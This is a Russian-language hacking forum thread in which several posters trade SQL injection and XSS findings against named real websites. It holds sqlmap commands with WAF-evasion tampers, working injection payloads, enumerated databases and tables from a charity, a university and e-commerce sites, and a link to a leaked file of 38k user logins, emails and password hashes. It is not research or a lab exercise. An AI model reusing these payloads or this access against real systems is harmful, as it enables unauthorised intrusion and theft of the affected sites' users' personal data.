Найденные интересеные SQL inj & XSS

[Gerron]

http://prntscr.com/taglxq имеем скулю. использовал эти тампера --tamper=space2comment.py --tamper=between.py --tamper=randomcase.py бд выводит все норм . но не выводит таблицы не одной из бд вот результат http://prntscr.com/tagjrs . не --hex --no-cast не чего не помогает
может кто то даст какой совет?

Такая же проблема была, не решил. Также интересует ответ

 

[badquery]

-u "https://www.unud.ac.id/in/daftar-dosen.html" --method="POST" -p "nama" --data="nama=&check%5B%5D=1"

Спойлер: sql

Parameter: nama (POST)
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: nama=' AND (SELECT 3234 FROM(SELECT COUNT(*),CONCAT(0x71716a7a71,(SELECT (ELT(3234=3234,1))),0x7170707071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- FuVn&check[]=1

    Type: UNION query
    Title: Generic UNION query (NULL) - 7 columns
    Payload: nama=-1022' UNION ALL SELECT NULL,CONCAT(0x71716a7a71,0x6f434b66596b76686473765743464c4d514e575976536b7157466244454942475256554b65667455,0x7170707071),NULL,NULL,NULL,NULL,NULL-- rkMy&check[]=1

 

[nexxxt]

Спойлер

GET /1'"/b HTTP/1.1
Referer: https://www.xkitchen24.com/
Cookie: PHPSESSID=efe4c8a385520405cc7aea5591eed702;hidecookiedingsbums=1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Host: www.xkitchen24.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36 Connection: Keep-alive

 

[getsigned]

Посоветуйте софт для подмены POST и других http запросов с поддержкой TLS, SSL.

 

[Поп-Хлоп]

Посоветуйте софт для подмены POST и других http запросов с поддержкой TLS, SSL.

Burp Suite, кеп

 

[SaT311it3]

Один из векторов

Payload: https://arthritis.ca:443/living-well/about-flourish?Topic=1 AND 1405 IN (SELECT (CHAR(113)+CHAR(113)+CHAR(118)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (1405=1405) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(120)+CHAR(107)+CHAR(98)+CHAR(113)))&aliaspath=/Living-Well/About-flourish

Database: arthritis_society
Table: OM_Contact
[31 columns]
+----------------------------------------------------+
| Column                                             |
+----------------------------------------------------+
| ContactAddress1                                    |
| ContactBirthday                                    |
| ContactBounces                                     |
| ContactBusinessPhone                               |
| ContactCampaign                                    |
| ContactCity                                        |
| ContactCompanyName                                 |
| ContactCountryID                                   |
| ContactCreated                                     |
| ContactEmail                                       |
| ContactFirstName                                   |
| ContactGender                                      |
| ContactGUID                                        |
| ContactID                                          |
| ContactJobTitle                                    |
| ContactLastModified                                |
| ContactLastName                                    |
| ContactMiddleName                                  |
| ContactMobilePhone                                 |
| ContactMonitored                                   |
| ContactNotes                                       |
| ContactOwnerUserID                                 |
| ContactPersonaID                                   |
| ContactSalesForceLeadID                            |
| ContactSalesForceLeadReplicationDateTime           |
| ContactSalesForceLeadReplicationDisabled           |
| ContactSalesForceLeadReplicationRequired           |
| ContactSalesForceLeadReplicationSuspensionDateTime |
| ContactStateID                                     |
| ContactStatusID                                    |
| ContactZIP                                         |
+----------------------------------------------------+

500+ тыс строк

 

[hits]

шел и 3 sql injection

12309 2.0

https://www.cprcomputerrecycling.co.uk/refurbished-computers/rcp.asp?cat=1

SILK PRINTED SAREE (BK1093)

www.khadindia.com

QQ Lake Shore Flower Shop

QQ Lake Shore Flower Shop online shop in Etobicoke, M8V1B6, Place your order online. Have your products delivered from this Flower Shop

www.ejoycity.ca

 

[BuyKall]

Ну что, пора и мне вписаться и скинуть сюда хлам, который самому не нужен

http://drewapenaar.nl/project.php?id=67 (GET)  # sqlmap/sqlmap.py --random-agent --time-sec=32 --batch --identify-waf --current-user --is-dba --level=5 --risk=3 --threads=10 --output-dir=dumps --timeout=180 --retries=4 --technique=BETQUS --exclude-sysdbs --cleanup --hex --answers=y --url=http://drewapenaar.nl/project.php?id=67 --answers=quit=n,crack=n

current user: 'db_40_drewapen@localhost'
current user is DBA: False

----

http://balanceaco.com/admin/index.php?id=4 (GET)  # sqlmap/sqlmap.py --random-agent --time-sec=32 --batch --identify-waf --current-user --is-dba --level=5 --risk=3 --threads=10 --output-dir=dumps --timeout=180 --retries=4 --technique=BETQUS --exclude-sysdbs --cleanup --hex --answers=y --url=http://balanceaco.com/admin/index.php?id=4 --answers=quit=n,crack=n

current user: 'balanceaco@%'
current user is DBA: False

----

 

[Duble]

Sqlinj в шопе краденых банк-акков

Сайт: https://bashop.top/
Parameter: #1* (URI)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: http://bashop.top:80/?category=36 AND 2046=2046
    Vector: AND [INFERENCE]
---
web application technology: PHP 7.1.33
back-end DBMS: MySQL >= 5.0.0
available databases [2]:
[*] c70027uc_shop
[*] information_schema

 

[SaT311it3]

Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: https://whos.amung.us:443/psrvwidget/?k=-4400' OR 5693=5693 OR 'miKm'='fmHS
available databases [5]:
[*] accounts_api
[*] accounts_pro
[*] accounts_pro2
[*] accounts_pronew
[*] information_schema

 

[etc/passwd]

Давно xss не было.

https://solncesvet.ru/editor/olimpiadi?auth=<script>alert()</script>

Сразу мы авторизуемся.

 

[Duble]

Экономическая игра с выводом денег.

Golden Oligarch - экономическая онлайн игра с выводом реальных денег

Golden Oligarch - экономическая онлайн игра с выводом реальных денег. Моментальные выплаты на популярные платежные системы

golden-oligarch.biz

Golden Oligarch - экономическая онлайн игра с выводом реальных денег

Golden Oligarch - экономическая онлайн игра с выводом реальных денег. Моментальные выплаты на популярные платежные системы

golden-oligarch.biz

Golden Oligarch - экономическая онлайн игра с выводом реальных денег

Golden Oligarch - экономическая онлайн игра с выводом реальных денег. Моментальные выплаты на популярные платежные системы

golden-oligarch.biz

Golden Oligarch - экономическая онлайн игра с выводом реальных денег

Golden Oligarch - экономическая онлайн игра с выводом реальных денег. Моментальные выплаты на популярные платежные системы

golden-oligarch.biz

Лень крутить, мап не крутит.

 

[C0rtex]

Давно xss не было.

https://solncesvet.ru/editor/olimpiadi?auth=<script>alert()</script>

Сразу мы авторизуемся.

xD

 

[C0rtex]

Royal Furniture

www.royalfurniturewinnipeg.ca

 

[C0rtex]

GET /product.php?id=-170%27+union+select+1,2,3,column_name,5,6,7,8,9,10,11,12,13,14+from+information_schema.columns+where+table_name='ordenes'+limit+§0§,1+--+- HTTP/1.1
Host: bmxworldstore.com
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: ru-RU,ru;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

 

[Duble]

sqlmap --threads 10 --risk 3 --level 5 --url "https://www.tradekey.com/index.php?action=widgets_signup_verify_email&return=json" --data="code=&company=&country=163*&form_type=exit_intent&industry_exit=33&is_buyer_or_seller=&is_buyer_supplier=2&memberarea=https://www.tradekey.com/index.html%3Faction=memberarea_index&password=&pm_contact_no=&pm_email=sample%40email.tst&pm_name=e&product=e&s_message=&show_captcha=0&sid=853465440" --random-agent --timeout=100 --time-sec=100 --batch --tamper=between  --hex

available databases [3]:
[*] information_schema
[*] test
[*] tradesql_tradekey

 

[Duble]

Единый портал предпринимателей Санкт-Петербург

Parameter: #1* (URI)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: https://www.crpp.ru:443/novosti/novosti_tsrpp?tags=15) AND 5434=5434 AND (2421=2421
    Vector: AND [INFERENCE]

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: https://www.crpp.ru:443/novosti/novosti_tsrpp?tags=15) AND SLEEP(20) AND (5393=5393
    Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])

--url "https://www.crpp.ru/novosti/novosti_tsrpp?tags=15*"  --threads=1--time-sec=20 --random-agent --risk 3 --level 3 --batch  --dbs --hex

Базы данных

available databases [6]:
[*] ecp_public
[*] ecp_public2
[*] ecp_test
[*] ecp_test2
[*] information_schema
[*] test

 

[Duble]

Какой то сайт обзора партнерских программ, хайп пирамид, арбиатража трафика и прочего.

sqlmap --threads 1 --risk 3 --level 5 --url "https://partnerkin.com/offer?geo_id[]=1&goal_id[]=1&partner_id[]=28&search=1*&sort=name.asc&submit=" --random-agent --timeout=100 --time-sec=100 --batch --dbs
available databases [4]:
[*] en_partnerkin.com
[*] information_schema
[*] partnerkin.com
[*] test.partnerkin.com

Parameter: #1* (URI)
    Type: error-based
    Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
    Payload: https://partnerkin.com:443/offer?geo_id[]=1&goal_id[]=1&partner_id[]=28&search=1" AND EXTRACTVALUE(5523,CONCAT(0x5c,0x716a787171,(SELECT (ELT(5523=5523,1))),0x71626b7871))-- HgQD&sort=name.asc&submit=

    Type: stacked queries
    Title: MySQL > 5.0.11 stacked queries (comment)
    Payload: https://partnerkin.com:443/offer?geo_id[]=1&goal_id[]=1&partner_id[]=28&search=1";SELECT SLEEP(100)#&sort=name.asc&submit=

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: https://partnerkin.com:443/offer?geo_id[]=1&goal_id[]=1&partner_id[]=28&search=1" AND (SELECT * FROM (SELECT(SLEEP(100)))Esci)-- SVUP&sort=name.asc&submit=
---

38к юзеров в тхт
login,email,password https://www.mediafire.com/file/u1xuo1d43mxsj3f/partnerkin.txt/file
md5

 

[SaT311it3]

Один из сабдоменов крупной маркетплейс площадкии индии


Payload: http://whitelight-energies-pvt-ltd.shopclues.com:80/panasonic-f-pbj30ard-28-watt-air-purifier' AND 4466=4466-- ivOh.html

web server operating system: Linux CentOS 6
web application technology: Apache 2.2.15
back-end DBMS: MySQL 5 (MariaDB fork)

current user is DBA: False

 

[SaT311it3]

Parameter: #1* (URI)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: http://tools.ibx.com:80/preventive-services/results/index.php?agecategory=12' AND 7282=7282 AND 'oOYT'='oOYT&gender=female

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: http://tools.ibx.com:80/preventive-services/results/index.php?agecategory=12' AND (SELECT 8736 FROM (SELECT(SLEEP(5)))zJim) AND 'jfxF'='jfxF&gender=female

web application technology: Nginx 1.16.1
back-end DBMS: MySQL >= 5.0.12 (Percona fork)
WAF ModSecurity (Trustwave)